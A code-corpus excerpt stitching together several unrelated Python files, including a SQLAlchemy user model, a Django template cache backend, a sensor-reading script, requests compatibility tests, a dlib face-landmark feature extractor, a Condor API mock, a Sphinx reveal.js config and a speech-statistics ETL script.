<filename>charybdis/user/models.py from uuid import uuid4 from passlib.hash import pbkdf2_sha512 from slugify import slugify from sqlalchemy.dialects.postgresql import UUID from sqlalchemy.ext.hybrid import hybrid_property from sqlalchemy.orm import backref from ..app import db from ..domain.models import Domain from ..permission.models import Permission from ..project.models import Project class UserRole(db.Model): slug = db.Column(db.String, nullable=False) @db.validates("slug") def validate_slug(self, key, value) -> str: assert slugify(value) == value, "Incorrect slug for user role!" return value class User(db.Model): first_name = db.Column(db.String, nullable=False) last_name = db.Column(db.String, nullable=False) patronymic = db.Column(db.String, nullable=True) birthday = db.Column(db.Date, nullable=False) role_id = db.Column(db.Integer, db.ForeignKey(UserRole.id), nullable=False) role = db.relationship(UserRole) is_active = db.Column(db.Boolean, default=True, server_default="true") username = db.Column(db.String, unique=True) _password_hash = db.Column("password_hash", db.String) uuid = db.Column(UUID(as_uuid=True), default=uuid4, nullable=False) domain_id = db.Column(db.Integer, db.ForeignKey(Domain.id), nullable=False) domain = db.relationship(Domain) @db.validates("username") def validate_username(self, key: str, value: str) -> str: assert value == slugify(value), "Incorrect username!" 
return value @property def rolename(self): return self.role.slug @classmethod def lookup(cls, username): return cls.query.filter_by(username=username).one_or_none() @hybrid_property def password_hash(self) -> str: return self._password_hash @password_hash.setter def password_hash(self, value: str) -> None: self._password_hash = <PASSWORD>.<PASSWORD>(value) def check_password(self, candidate: str) -> bool: return pbkdf2_sha512.verify(candidate, self._password_hash) class UserPermissionLinker(db.Model): permission_id = db.Column(db.Integer, db.ForeignKey(Permission.id), nullable=False) user_id = db.Column(db.Integer, db.ForeignKey(User.id), nullable=False) permission = db.relationship(Permission, uselist=False) user = db.relationship(User) project_id = db.Column(db.Integer, db.ForeignKey(Project.id), nullable=False) project = db.relationship(Project, backref=backref("users"), uselist=False) __table_args__ = (db.UniqueConstraint("permission_id", "user_id", "project_id"),)
none
1
2.47512
2
apps/external_apps/dbtemplates/cache.py
indro/t2c
3
6623605
import os from django.conf import settings from django.core.cache import cache from django.template import TemplateDoesNotExist from django.core.exceptions import ImproperlyConfigured from django.utils.encoding import smart_unicode, force_unicode class BaseCacheBackend(object): """ Base class for custom cache backend of dbtemplates to be used while subclassing. Set DBTEMPLATES_CACHE_BACKEND setting to the Python path to that subclass. """ def _site(self): from django.contrib.sites.models import Site return Site.objects.get_current() site = property(_site) def load(self, name): """ Loads a template from the cache with the given name. """ raise NotImplemented def save(self, name, content): """ Saves the given template content with the given name in the cache. """ raise NotImplemented def remove(self, name): """ Removes the template with the given name from the cache. """ raise NotImplemented class DjangoCacheBackend(BaseCacheBackend): """ A cache backend that uses Django's cache mechanism. """ def _cache_key(self, name): return 'dbtemplates::%s' % name def load(self, name): cache_key = self._cache_key(name) return cache.get(cache_key) def save(self, name, content): cache_key = self._cache_key(name) cache.set(cache_key, content) def remove(self, name): cache_key = self._cache_key(name) cache.delete(cache_key) class FileSystemBackend(BaseCacheBackend): """ A cache backend that uses simple files to hold the template cache. """ def __init__(self): try: self.cache_dir = getattr(settings, 'DBTEMPLATES_CACHE_DIR', None) self.cache_dir = os.path.normpath(self.cache_dir) if not os.path.isdir(self.cache_dir): pass except: raise ImproperlyConfigured('You\'re using the dbtemplates\' file system cache backend without having set the DBTEMPLATES_CACHE_DIR setting to a valid value. 
Make sure the directory exists and is writeable for the user your Django instance is running with.') super(FileSystemBackend, self).__init__() def _filepath(self, name): return os.path.join(self.cache_dir, name) def load(self, name): try: filepath = self._filepath(name) return open(filepath).read().decode('utf-8') except: return None def save(self, name, content, retry=False): try: filepath = self._filepath(name) dirname = os.path.dirname(filepath) if not os.path.exists(dirname): os.makedirs(dirname) cache_file = open(filepath, 'w') cache_file.write(force_unicode(content).encode('utf-8')) cache_file.close() except Exception: raise def remove(self, name): try: filepath = self._filepath(name) os.remove(filepath) except: pass
import os from django.conf import settings from django.core.cache import cache from django.template import TemplateDoesNotExist from django.core.exceptions import ImproperlyConfigured from django.utils.encoding import smart_unicode, force_unicode class BaseCacheBackend(object): """ Base class for custom cache backend of dbtemplates to be used while subclassing. Set DBTEMPLATES_CACHE_BACKEND setting to the Python path to that subclass. """ def _site(self): from django.contrib.sites.models import Site return Site.objects.get_current() site = property(_site) def load(self, name): """ Loads a template from the cache with the given name. """ raise NotImplemented def save(self, name, content): """ Saves the given template content with the given name in the cache. """ raise NotImplemented def remove(self, name): """ Removes the template with the given name from the cache. """ raise NotImplemented class DjangoCacheBackend(BaseCacheBackend): """ A cache backend that uses Django's cache mechanism. """ def _cache_key(self, name): return 'dbtemplates::%s' % name def load(self, name): cache_key = self._cache_key(name) return cache.get(cache_key) def save(self, name, content): cache_key = self._cache_key(name) cache.set(cache_key, content) def remove(self, name): cache_key = self._cache_key(name) cache.delete(cache_key) class FileSystemBackend(BaseCacheBackend): """ A cache backend that uses simple files to hold the template cache. """ def __init__(self): try: self.cache_dir = getattr(settings, 'DBTEMPLATES_CACHE_DIR', None) self.cache_dir = os.path.normpath(self.cache_dir) if not os.path.isdir(self.cache_dir): pass except: raise ImproperlyConfigured('You\'re using the dbtemplates\' file system cache backend without having set the DBTEMPLATES_CACHE_DIR setting to a valid value. 
Make sure the directory exists and is writeable for the user your Django instance is running with.') super(FileSystemBackend, self).__init__() def _filepath(self, name): return os.path.join(self.cache_dir, name) def load(self, name): try: filepath = self._filepath(name) return open(filepath).read().decode('utf-8') except: return None def save(self, name, content, retry=False): try: filepath = self._filepath(name) dirname = os.path.dirname(filepath) if not os.path.exists(dirname): os.makedirs(dirname) cache_file = open(filepath, 'w') cache_file.write(force_unicode(content).encode('utf-8')) cache_file.close() except Exception: raise def remove(self, name): try: filepath = self._filepath(name) os.remove(filepath) except: pass
en
0.619798
Base class for custom cache backend of dbtemplates to be used while subclassing. Set DBTEMPLATES_CACHE_BACKEND setting to the Python path to that subclass. Loads a template from the cache with the given name. Saves the given template content with the given name in the cache. Removes the template with the given name from the cache. A cache backend that uses Django's cache mechanism. A cache backend that uses simple files to hold the template cache.
2.17045
2
examples/raspi/output_sensor_data.py
WeHaus/WeHaus_NodeJS_Client
0
6623606
#!/usr/bin/python import sys import Adafruit_DHT humidity, temperature = Adafruit_DHT.read_retry(11, 4) print('{0:0.1f},{1:0.1f}'.format(temperature, humidity))
#!/usr/bin/python import sys import Adafruit_DHT humidity, temperature = Adafruit_DHT.read_retry(11, 4) print('{0:0.1f},{1:0.1f}'.format(temperature, humidity))
ru
0.258958
#!/usr/bin/python
2.642467
3
tests/requests_compat/test_api.py
mwoss/httpx
1
6623607
<reponame>mwoss/httpx """Test compatibility with the Requests high-level API.""" import pytest import requests @pytest.mark.copied_from( "https://github.com/psf/requests/blob/v2.22.0/tests/test_requests.py#L61-L70" ) def test_entrypoints(): requests.session requests.session().get requests.session().head requests.get requests.head requests.put requests.patch requests.post @pytest.mark.copied_from( "https://github.com/psf/requests/blob/v2.22.0/tests/test_requests.py#L72", changes=["added noqa comment to silence flake8"], ) @pytest.mark.xfail( reason="PoolManager has no obvious equivalent in HTTPX", raises=ImportError ) def test_poolmanager_entrypoint(): # Not really an entry point, but people rely on it. from requests.packages.urllib3.poolmanager import PoolManager # noqa: F401
"""Test compatibility with the Requests high-level API.""" import pytest import requests @pytest.mark.copied_from( "https://github.com/psf/requests/blob/v2.22.0/tests/test_requests.py#L61-L70" ) def test_entrypoints(): requests.session requests.session().get requests.session().head requests.get requests.head requests.put requests.patch requests.post @pytest.mark.copied_from( "https://github.com/psf/requests/blob/v2.22.0/tests/test_requests.py#L72", changes=["added noqa comment to silence flake8"], ) @pytest.mark.xfail( reason="PoolManager has no obvious equivalent in HTTPX", raises=ImportError ) def test_poolmanager_entrypoint(): # Not really an entry point, but people rely on it. from requests.packages.urllib3.poolmanager import PoolManager # noqa: F401
en
0.949581
Test compatibility with the Requests high-level API. #L61-L70" #L72", # Not really an entry point, but people rely on it. # noqa: F401
2.329088
2
AMLS_19-20_ZHIDIAN_XIE_SN16077117/face_landmarks.py
RawTimmy/AMLSassignment19_20
1
6623608
import os import numpy as np from keras.preprocessing import image import cv2 import dlib # PATH TO ALL IMAGES # global basedir_celeba, basedir_cartoon, image_paths_celeba, image_paths_cartoon, target_size global basedir_celeba, basedir_celeba_test, image_paths_celeba, image_paths_celeba_test, target_size basedir_celeba = './Datasets/celeba' basedir_celeba_test = './Datasets/dataset_test_AMLS_19-20/celeba_test' images_dir_celeba = os.path.join(basedir_celeba,'img') images_dir_celeba_test = os.path.join(basedir_celeba_test,'img') # basedir_cartoon = './Datasets/cartoon_set' # images_dir_cartoon = os.path.join(basedir_cartoon,'img') labels_filename = 'labels.csv' detector = dlib.get_frontal_face_detector() predictor = dlib.shape_predictor('shape_predictor_68_face_landmarks.dat') # how to find frontal human faces in an image using 68 landmarks. These are points on the face such as the corners of the mouth, along the eyebrows, on the eyes, and so forth. # The face detector we use is made using the classic Histogram of Oriented # Gradients (HOG) feature combined with a linear classifier, an image pyramid, # and sliding window detection scheme. The pose estimator was created by # using dlib's implementation of the paper: # One Millisecond Face Alignment with an Ensemble of Regression Trees by # <NAME> and <NAME>, CVPR 2014 # and was trained on the iBUG 300-W face landmark dataset (see https://ibug.doc.ic.ac.uk/resources/facial-point-annotations/): # <NAME>, <NAME>, <NAME>, <NAME>, <NAME>. # 300 faces In-the-wild challenge: Database and results. # Image and Vision Computing (IMAVIS), Special Issue on Facial Landmark Localisation "In-The-Wild". 2016. 
def shape_to_np(shape, dtype="int"): # initialize the list of (x, y)-coordinates coords = np.zeros((shape.num_parts, 2), dtype=dtype) # loop over all facial landmarks and convert them # to a 2-tuple of (x, y)-coordinates for i in range(0, shape.num_parts): coords[i] = (shape.part(i).x, shape.part(i).y) # return the list of (x, y)-coordinates return coords def rect_to_bb(rect): # take a bounding predicted by dlib and convert it # to the format (x, y, w, h) as we would normally do # with OpenCV x = rect.left() y = rect.top() w = rect.right() - x h = rect.bottom() - y # return a tuple of (x, y, w, h) return (x, y, w, h) def run_dlib_shape(image): # in this function we load the image, detect the landmarks of the face, and then return the image and the landmarks # load the input image, resize it, and convert it to grayscale resized_image = image.astype('uint8') gray = cv2.cvtColor(resized_image, cv2.COLOR_BGR2GRAY) gray = gray.astype('uint8') # detect faces in the grayscale image rects = detector(gray, 1) num_faces = len(rects) if num_faces == 0: return None, resized_image face_areas = np.zeros((1, num_faces)) face_shapes = np.zeros((136, num_faces), dtype=np.int64) # loop over the face detections for (i, rect) in enumerate(rects): # determine the facial landmarks for the face region, then # convert the facial landmark (x, y)-coordinates to a NumPy # array temp_shape = predictor(gray, rect) temp_shape = shape_to_np(temp_shape) # convert dlib's rectangle to a OpenCV-style bounding box # [i.e., (x, y, w, h)], # (x, y, w, h) = face_utils.rect_to_bb(rect) (x, y, w, h) = rect_to_bb(rect) face_shapes[:, i] = np.reshape(temp_shape, [136]) face_areas[0, i] = w * h # find largest face and keep dlibout = np.reshape(np.transpose(face_shapes[:, np.argmax(face_areas)]), [68, 2]) return dlibout, resized_image def extract_features_labels(test): """ This funtion extracts the landmarks features for all images in the folder 'Datasets/celeba/img'. 
It also extracts the gender label for each image. :return: landmark_features: an array containing 68 landmark points for each image in which a face was detected gender_labels: an array containing the gender label (male=0 and female=1) for each image in which a face was detected """ select_dir_celeba, select_basedir_celeba = None, None if test is False: select_dir_celeba, select_basedir_celeba = images_dir_celeba, basedir_celeba else: select_dir_celeba, select_basedir_celeba = images_dir_celeba_test, basedir_celeba_test image_paths_celeba = [os.path.join(select_dir_celeba, l) for l in os.listdir(select_dir_celeba)] target_size = None labels_file = open(os.path.join(select_basedir_celeba, labels_filename), 'r') lines = labels_file.readlines() gender_emo_labels = {line.split('\t')[1] : np.array([int(line.split('\t')[2]), int(line.split('\t')[3])]) for line in lines[1:]} if os.path.isdir(select_dir_celeba): all_features = [] all_labels = [] for img_path in image_paths_celeba: file_name= img_path.split('.')[1].split('/')[-1] # load image img = image.img_to_array( image.load_img(img_path, target_size=target_size, interpolation='bicubic')) features, _ = run_dlib_shape(img) if features is not None: all_features.append(features) all_labels.append(gender_emo_labels[file_name+'.jpg']) output_features = np.array(all_features) output_labels = (np.array(all_labels) + 1) / 2 return output_features, output_labels # def extract_features_labels_cartoon(): # image_paths_cartoon = [os.path.join(images_dir_cartoon, l) for l in os.listdir(images_dir_cartoon)] # target_size = None # labels_file = open(os.path.join(basedir_cartoon, labels_filename), 'r') # lines = labels_file.readlines() # face_shape_labels = {line.split('\t')[-1].split('\n')[0] : int(line.split('\t')[2]) for line in lines[1:]} # # eye_color_labels = {line.split('\t')[-1].split('\n')[0] : int(line.split('\t')[2]) for line in lines[1:]} # # if os.path.isdir(images_dir_cartoon): # all_features = [] # all_labels_face_shape = 
[] # all_labels_eye_color = [] # for img_path in image_paths_cartoon: # file_name = img_path.split('.')[1].split('/')[-1] # # img = image.img_to_array(image.load_img(img_path, # target_size=(128,128), # interpolation='bicubic')) # features, _ = run_dlib_shape(img) # if features is not None: # all_features.append(features) # all_labels_face_shape.append(face_shape_labels[file_name+'.png']) # all_labels_eye_color.append(eye_color_labels[file_name+'.png']) # # landmark_features = np.array(all_features) # face_shape_labels = np.array(all_labels_face_shape) # eye_color_labels = np.array(all_labels_eye_color) # return landmark_features, face_shape_labels, eye_color_labels
import os import numpy as np from keras.preprocessing import image import cv2 import dlib # PATH TO ALL IMAGES # global basedir_celeba, basedir_cartoon, image_paths_celeba, image_paths_cartoon, target_size global basedir_celeba, basedir_celeba_test, image_paths_celeba, image_paths_celeba_test, target_size basedir_celeba = './Datasets/celeba' basedir_celeba_test = './Datasets/dataset_test_AMLS_19-20/celeba_test' images_dir_celeba = os.path.join(basedir_celeba,'img') images_dir_celeba_test = os.path.join(basedir_celeba_test,'img') # basedir_cartoon = './Datasets/cartoon_set' # images_dir_cartoon = os.path.join(basedir_cartoon,'img') labels_filename = 'labels.csv' detector = dlib.get_frontal_face_detector() predictor = dlib.shape_predictor('shape_predictor_68_face_landmarks.dat') # how to find frontal human faces in an image using 68 landmarks. These are points on the face such as the corners of the mouth, along the eyebrows, on the eyes, and so forth. # The face detector we use is made using the classic Histogram of Oriented # Gradients (HOG) feature combined with a linear classifier, an image pyramid, # and sliding window detection scheme. The pose estimator was created by # using dlib's implementation of the paper: # One Millisecond Face Alignment with an Ensemble of Regression Trees by # <NAME> and <NAME>, CVPR 2014 # and was trained on the iBUG 300-W face landmark dataset (see https://ibug.doc.ic.ac.uk/resources/facial-point-annotations/): # <NAME>, <NAME>, <NAME>, <NAME>, <NAME>. # 300 faces In-the-wild challenge: Database and results. # Image and Vision Computing (IMAVIS), Special Issue on Facial Landmark Localisation "In-The-Wild". 2016. 
def shape_to_np(shape, dtype="int"): # initialize the list of (x, y)-coordinates coords = np.zeros((shape.num_parts, 2), dtype=dtype) # loop over all facial landmarks and convert them # to a 2-tuple of (x, y)-coordinates for i in range(0, shape.num_parts): coords[i] = (shape.part(i).x, shape.part(i).y) # return the list of (x, y)-coordinates return coords def rect_to_bb(rect): # take a bounding predicted by dlib and convert it # to the format (x, y, w, h) as we would normally do # with OpenCV x = rect.left() y = rect.top() w = rect.right() - x h = rect.bottom() - y # return a tuple of (x, y, w, h) return (x, y, w, h) def run_dlib_shape(image): # in this function we load the image, detect the landmarks of the face, and then return the image and the landmarks # load the input image, resize it, and convert it to grayscale resized_image = image.astype('uint8') gray = cv2.cvtColor(resized_image, cv2.COLOR_BGR2GRAY) gray = gray.astype('uint8') # detect faces in the grayscale image rects = detector(gray, 1) num_faces = len(rects) if num_faces == 0: return None, resized_image face_areas = np.zeros((1, num_faces)) face_shapes = np.zeros((136, num_faces), dtype=np.int64) # loop over the face detections for (i, rect) in enumerate(rects): # determine the facial landmarks for the face region, then # convert the facial landmark (x, y)-coordinates to a NumPy # array temp_shape = predictor(gray, rect) temp_shape = shape_to_np(temp_shape) # convert dlib's rectangle to a OpenCV-style bounding box # [i.e., (x, y, w, h)], # (x, y, w, h) = face_utils.rect_to_bb(rect) (x, y, w, h) = rect_to_bb(rect) face_shapes[:, i] = np.reshape(temp_shape, [136]) face_areas[0, i] = w * h # find largest face and keep dlibout = np.reshape(np.transpose(face_shapes[:, np.argmax(face_areas)]), [68, 2]) return dlibout, resized_image def extract_features_labels(test): """ This funtion extracts the landmarks features for all images in the folder 'Datasets/celeba/img'. 
It also extracts the gender label for each image. :return: landmark_features: an array containing 68 landmark points for each image in which a face was detected gender_labels: an array containing the gender label (male=0 and female=1) for each image in which a face was detected """ select_dir_celeba, select_basedir_celeba = None, None if test is False: select_dir_celeba, select_basedir_celeba = images_dir_celeba, basedir_celeba else: select_dir_celeba, select_basedir_celeba = images_dir_celeba_test, basedir_celeba_test image_paths_celeba = [os.path.join(select_dir_celeba, l) for l in os.listdir(select_dir_celeba)] target_size = None labels_file = open(os.path.join(select_basedir_celeba, labels_filename), 'r') lines = labels_file.readlines() gender_emo_labels = {line.split('\t')[1] : np.array([int(line.split('\t')[2]), int(line.split('\t')[3])]) for line in lines[1:]} if os.path.isdir(select_dir_celeba): all_features = [] all_labels = [] for img_path in image_paths_celeba: file_name= img_path.split('.')[1].split('/')[-1] # load image img = image.img_to_array( image.load_img(img_path, target_size=target_size, interpolation='bicubic')) features, _ = run_dlib_shape(img) if features is not None: all_features.append(features) all_labels.append(gender_emo_labels[file_name+'.jpg']) output_features = np.array(all_features) output_labels = (np.array(all_labels) + 1) / 2 return output_features, output_labels # def extract_features_labels_cartoon(): # image_paths_cartoon = [os.path.join(images_dir_cartoon, l) for l in os.listdir(images_dir_cartoon)] # target_size = None # labels_file = open(os.path.join(basedir_cartoon, labels_filename), 'r') # lines = labels_file.readlines() # face_shape_labels = {line.split('\t')[-1].split('\n')[0] : int(line.split('\t')[2]) for line in lines[1:]} # # eye_color_labels = {line.split('\t')[-1].split('\n')[0] : int(line.split('\t')[2]) for line in lines[1:]} # # if os.path.isdir(images_dir_cartoon): # all_features = [] # all_labels_face_shape = 
[] # all_labels_eye_color = [] # for img_path in image_paths_cartoon: # file_name = img_path.split('.')[1].split('/')[-1] # # img = image.img_to_array(image.load_img(img_path, # target_size=(128,128), # interpolation='bicubic')) # features, _ = run_dlib_shape(img) # if features is not None: # all_features.append(features) # all_labels_face_shape.append(face_shape_labels[file_name+'.png']) # all_labels_eye_color.append(eye_color_labels[file_name+'.png']) # # landmark_features = np.array(all_features) # face_shape_labels = np.array(all_labels_face_shape) # eye_color_labels = np.array(all_labels_eye_color) # return landmark_features, face_shape_labels, eye_color_labels
en
0.726333
# PATH TO ALL IMAGES # global basedir_celeba, basedir_cartoon, image_paths_celeba, image_paths_cartoon, target_size # basedir_cartoon = './Datasets/cartoon_set' # images_dir_cartoon = os.path.join(basedir_cartoon,'img') # how to find frontal human faces in an image using 68 landmarks. These are points on the face such as the corners of the mouth, along the eyebrows, on the eyes, and so forth. # The face detector we use is made using the classic Histogram of Oriented # Gradients (HOG) feature combined with a linear classifier, an image pyramid, # and sliding window detection scheme. The pose estimator was created by # using dlib's implementation of the paper: # One Millisecond Face Alignment with an Ensemble of Regression Trees by # <NAME> and <NAME>, CVPR 2014 # and was trained on the iBUG 300-W face landmark dataset (see https://ibug.doc.ic.ac.uk/resources/facial-point-annotations/): # <NAME>, <NAME>, <NAME>, <NAME>, <NAME>. # 300 faces In-the-wild challenge: Database and results. # Image and Vision Computing (IMAVIS), Special Issue on Facial Landmark Localisation "In-The-Wild". 2016. 
# initialize the list of (x, y)-coordinates # loop over all facial landmarks and convert them # to a 2-tuple of (x, y)-coordinates # return the list of (x, y)-coordinates # take a bounding predicted by dlib and convert it # to the format (x, y, w, h) as we would normally do # with OpenCV # return a tuple of (x, y, w, h) # in this function we load the image, detect the landmarks of the face, and then return the image and the landmarks # load the input image, resize it, and convert it to grayscale # detect faces in the grayscale image # loop over the face detections # determine the facial landmarks for the face region, then # convert the facial landmark (x, y)-coordinates to a NumPy # array # convert dlib's rectangle to a OpenCV-style bounding box # [i.e., (x, y, w, h)], # (x, y, w, h) = face_utils.rect_to_bb(rect) # find largest face and keep This funtion extracts the landmarks features for all images in the folder 'Datasets/celeba/img'. It also extracts the gender label for each image. :return: landmark_features: an array containing 68 landmark points for each image in which a face was detected gender_labels: an array containing the gender label (male=0 and female=1) for each image in which a face was detected # load image # def extract_features_labels_cartoon(): # image_paths_cartoon = [os.path.join(images_dir_cartoon, l) for l in os.listdir(images_dir_cartoon)] # target_size = None # labels_file = open(os.path.join(basedir_cartoon, labels_filename), 'r') # lines = labels_file.readlines() # face_shape_labels = {line.split('\t')[-1].split('\n')[0] : int(line.split('\t')[2]) for line in lines[1:]} # # eye_color_labels = {line.split('\t')[-1].split('\n')[0] : int(line.split('\t')[2]) for line in lines[1:]} # # if os.path.isdir(images_dir_cartoon): # all_features = [] # all_labels_face_shape = [] # all_labels_eye_color = [] # for img_path in image_paths_cartoon: # file_name = img_path.split('.')[1].split('/')[-1] # # img = image.img_to_array(image.load_img(img_path, # 
target_size=(128,128), # interpolation='bicubic')) # features, _ = run_dlib_shape(img) # if features is not None: # all_features.append(features) # all_labels_face_shape.append(face_shape_labels[file_name+'.png']) # all_labels_eye_color.append(eye_color_labels[file_name+'.png']) # # landmark_features = np.array(all_features) # face_shape_labels = np.array(all_labels_face_shape) # eye_color_labels = np.array(all_labels_eye_color) # return landmark_features, face_shape_labels, eye_color_labels
2.953247
3
src/python/WMQuality/Emulators/PyCondorAPI/MockPyCondorAPI.py
khurtado/WMCore
21
6623609
from __future__ import (division, print_function) from builtins import object class MockPyCondorAPI(object): """ Version of Services/PyCondor intended to be used with mock or unittest.mock """ def __init__(self, *args, **kwargs): print("Using MockPyCondorAPI") def getCondorJobsSummary(self): """ Mock a condor query for the job summary """ return [] def getCondorJobs(self, constraint='true', attrList=None, limit=-1, opts="SummaryOnly"): """ Given a job/schedd constraint, return a list of jobs attributes or None if the query to condor fails. """ return None def isScheddOverloaded(self): """check whether job limit is reached in local schedd""" return False
from __future__ import (division, print_function) from builtins import object class MockPyCondorAPI(object): """ Version of Services/PyCondor intended to be used with mock or unittest.mock """ def __init__(self, *args, **kwargs): print("Using MockPyCondorAPI") def getCondorJobsSummary(self): """ Mock a condor query for the job summary """ return [] def getCondorJobs(self, constraint='true', attrList=None, limit=-1, opts="SummaryOnly"): """ Given a job/schedd constraint, return a list of jobs attributes or None if the query to condor fails. """ return None def isScheddOverloaded(self): """check whether job limit is reached in local schedd""" return False
en
0.78907
Version of Services/PyCondor intended to be used with mock or unittest.mock Mock a condor query for the job summary Given a job/schedd constraint, return a list of jobs attributes or None if the query to condor fails. check whether job limit is reached in local schedd
2.945413
3
docs/conf.py
titilambert/sphinxjp.themes.revealjs
1
6623610
# -*- coding: utf-8 -*- # # -- General configuration ----------------------------------------------------- source_suffix = '.rst' master_doc = 'index' project = u'sphinx theme for reveal.js' copyright = u'2013, tell-k' version = '0.1.1' # -- Options for HTML output --------------------------------------------------- extensions = ['sphinxjp.themes.revealjs'] html_theme = 'revealjs' html_use_index = False # -- HTML theme options for `revealjs` style ------------------------------------- html_theme_options = { # Set the lang attribute of the html tag. Defaults to "ja" "lang": "ja", # The "normal" size of the presentation, aspect ratio will be preserved # when the presentation is scaled to fit different resolutions "width": 960, "height": 700, # Factor of the display size that should remain empty around the content "margin": 0.1, # Bounds for smallest/largest possible scale to apply to content "min_scale": 0.2, "max_scale": 1.0, # Display controls in the bottom right corner "controls": True, # Display a presentation progress bar "progress": True, # Push each slide change to the browser history "history": True, # Enable keyboard shortcuts for navigation "keyboard": True, # Enable the slide overview mode "overview": True, # Vertical centring of slides "center": True, # Enables touch navigation on devices with touch input "touch": True, # Loop the presentation "loop": False, # Change the presentation direction to be RTL "rtl": False, # Turns fragments on and off globally "fragments": True, # Number of milliseconds between automatically proceeding to the # next slide, disabled when set to 0, this value can be overwritten # by using a data-autoslide attribute on your slides "auto_slide": 0, # Enable slide navigation via mouse wheel "mouse_wheel": False, # Apply a 3D roll to links on hover "rolling_links": True, # Opens links in an iframe preview overlay "preview_links": False, # Theme (default/beige/moon/night/serif/simple/sky/solarized) "theme": "default", # Transition 
style (default/cube/page/concave/zoom/linear/fade/none) "transition": "default", # Transition speed (default/fast/slow) "transition_speed": "default", # Transition style for full page slide backgrounds (default/linear) "background_transition": "default", # Enable plguin javascript for reveal.js "plugin_list": ["search/search.js", "remotes/remotes.js"], }
# -*- coding: utf-8 -*- # # -- General configuration ----------------------------------------------------- source_suffix = '.rst' master_doc = 'index' project = u'sphinx theme for reveal.js' copyright = u'2013, tell-k' version = '0.1.1' # -- Options for HTML output --------------------------------------------------- extensions = ['sphinxjp.themes.revealjs'] html_theme = 'revealjs' html_use_index = False # -- HTML theme options for `revealjs` style ------------------------------------- html_theme_options = { # Set the lang attribute of the html tag. Defaults to "ja" "lang": "ja", # The "normal" size of the presentation, aspect ratio will be preserved # when the presentation is scaled to fit different resolutions "width": 960, "height": 700, # Factor of the display size that should remain empty around the content "margin": 0.1, # Bounds for smallest/largest possible scale to apply to content "min_scale": 0.2, "max_scale": 1.0, # Display controls in the bottom right corner "controls": True, # Display a presentation progress bar "progress": True, # Push each slide change to the browser history "history": True, # Enable keyboard shortcuts for navigation "keyboard": True, # Enable the slide overview mode "overview": True, # Vertical centring of slides "center": True, # Enables touch navigation on devices with touch input "touch": True, # Loop the presentation "loop": False, # Change the presentation direction to be RTL "rtl": False, # Turns fragments on and off globally "fragments": True, # Number of milliseconds between automatically proceeding to the # next slide, disabled when set to 0, this value can be overwritten # by using a data-autoslide attribute on your slides "auto_slide": 0, # Enable slide navigation via mouse wheel "mouse_wheel": False, # Apply a 3D roll to links on hover "rolling_links": True, # Opens links in an iframe preview overlay "preview_links": False, # Theme (default/beige/moon/night/serif/simple/sky/solarized) "theme": "default", # Transition 
style (default/cube/page/concave/zoom/linear/fade/none) "transition": "default", # Transition speed (default/fast/slow) "transition_speed": "default", # Transition style for full page slide backgrounds (default/linear) "background_transition": "default", # Enable plguin javascript for reveal.js "plugin_list": ["search/search.js", "remotes/remotes.js"], }
en
0.599509
# -*- coding: utf-8 -*- # # -- General configuration ----------------------------------------------------- # -- Options for HTML output --------------------------------------------------- # -- HTML theme options for `revealjs` style ------------------------------------- # Set the lang attribute of the html tag. Defaults to "ja" # The "normal" size of the presentation, aspect ratio will be preserved # when the presentation is scaled to fit different resolutions # Factor of the display size that should remain empty around the content # Bounds for smallest/largest possible scale to apply to content # Display controls in the bottom right corner # Display a presentation progress bar # Push each slide change to the browser history # Enable keyboard shortcuts for navigation # Enable the slide overview mode # Vertical centring of slides # Enables touch navigation on devices with touch input # Loop the presentation # Change the presentation direction to be RTL # Turns fragments on and off globally # Number of milliseconds between automatically proceeding to the # next slide, disabled when set to 0, this value can be overwritten # by using a data-autoslide attribute on your slides # Enable slide navigation via mouse wheel # Apply a 3D roll to links on hover # Opens links in an iframe preview overlay # Theme (default/beige/moon/night/serif/simple/sky/solarized) # Transition style (default/cube/page/concave/zoom/linear/fade/none) # Transition speed (default/fast/slow) # Transition style for full page slide backgrounds (default/linear) # Enable plguin javascript for reveal.js
1.232244
1
src/etl/speech_stats.py
dmegbert/prez-speech
0
6623611
from concurrent.futures import ThreadPoolExecutor, as_completed from statistics import median from psycopg2.extras import execute_values import textstat from sklearn.feature_extraction.text import CountVectorizer from textblob import TextBlob from src.db_utils import safe_cursor def get_speech_stats(speech_id): with safe_cursor() as cur: cur.execute('SELECT id, president_id, transcript FROM speeches WHERE id = %s', (speech_id,)) raw_speech = cur.fetchone() speech = {'speech_id': raw_speech.id, 'president_id': raw_speech.president_id, 'speech': raw_speech.transcript} raw_text = speech['speech'] sp_blob = TextBlob(raw_text) speech['polarity'], speech['subjectivity'] = sp_blob.sentiment speech['word_count'] = len(sp_blob.words) speech['sentence_count'] = len(sp_blob.sentences) speech['median_sentence_length'] = median([len(sentence) for sentence in sp_blob.sentences]) common_words = get_top_n_words([raw_text], 50, (1, 1)) unigrams_dict = _format_unigrams(common_words, speech['president_id'], speech['speech_id']) speech['grade_reading_level'] = textstat.coleman_liau_index(raw_text) return speech, unigrams_dict def _format_unigrams(common_words, president_id, speech_id): speech_constants = {'president_id': president_id, 'speech_id': speech_id} return [{'unigram': word, 'count': ct, **speech_constants} for word, ct in common_words] def get_speeches(): with ThreadPoolExecutor(max_workers=10) as executor: futures = [executor.submit(get_speech_stats, speech_id) for speech_id in range(1, 1022)] for future in as_completed(futures): try: load_speech_stats(future.result()) except Exception as exc: print(exc) def load_speech_stats(stats_and_unigrams): stats, unigrams = stats_and_unigrams with safe_cursor() as cur_2: execute_values( cur_2, 'INSERT INTO unigrams' '(president_id, speech_id, unigram, occurrence)' 'VALUES %s', unigrams, '(%(president_id)s, %(speech_id)s, %(unigram)s, %(count)s)' ) with safe_cursor() as cur: cur.execute( 'INSERT INTO speech_stats' '(speech_id, 
polarity, subjectivity, word_count,' 'sentence_count, president_id, grade_reading_level) ' 'VALUES (%(speech_id)s, %(polarity)s, %(subjectivity)s,' '%(word_count)s, %(sentence_count)s, %(president_id)s, %(grade_reading_level)s)', stats ) def get_top_n_words(corpus, n=20, ngram_range=(1, 1)): vec = CountVectorizer(strip_accents='unicode', stop_words='english', ngram_range=ngram_range).fit(corpus) bag_of_words = vec.transform(corpus) sum_words = bag_of_words.sum(axis=0) words_freq = [(word, int(sum_words[0, idx])) for word, idx in vec.vocabulary_.items()] words_freq = sorted(words_freq, key=lambda x: x[1], reverse=True) return words_freq[:n]
